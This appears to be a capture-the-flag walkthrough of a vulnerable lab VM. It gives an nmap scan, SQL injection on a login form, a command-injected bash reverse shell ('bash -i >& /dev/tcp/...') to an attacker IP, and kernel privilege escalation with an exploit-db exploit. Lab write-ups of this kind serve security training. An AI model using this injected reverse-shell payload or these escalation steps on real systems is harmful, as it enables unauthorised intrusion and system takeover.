# Nmap 7.80 scan initiated Thu May 7 09:13:13 2020 as: nmap -sC -sV -oA nmap/Level2 192.168.43.215
Nmap scan report for 192.168.43.215
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-05-07T10:04:36+00:00; -3h09m24s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:52:3C:FB (VMware)
Host script results:
|_clock-skew: -3h09m24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 7 09:14:28 2020 -- 1 IP address (1 host up) scanned in 75.51 seconds
SQL Injection
I saw there is a TCP port 80 open, so let's paste the link to the web browser
Saw a login form and I saw mysql running at the machine so I use SQL injection
Then, we got a box to ping a machine, lets use our machine's IP to test it out
Reverse Shell
So this means that we can enter reverse shell code to get a shell from the machine. We need to first pull up a netcat listener at port 443
Then we can go pentestmonkey to get the bash reverse shell code and put it in the box
;bash -i >& /dev/tcp/192.168.43.182/443 0>&1
After run we will get a shell from the reverse TCP. First we will try using the kernal exploit.
Privilege Escalation
After some search from the Google, we get the exploit from exploit-db.
We first download the exploit and store it at our machine and then we use python to create a server using python -m SimpleHTTPServer
We need to navigate to /tmp file and transfer the file from our machine to the victim machine.
After that rename the file from 9542 to 9542.c with .c extension. Then compile the exploit by using gcc 9542.c -o exploit. We then chmod +x exploit and run the exploit by typing ./exploit.
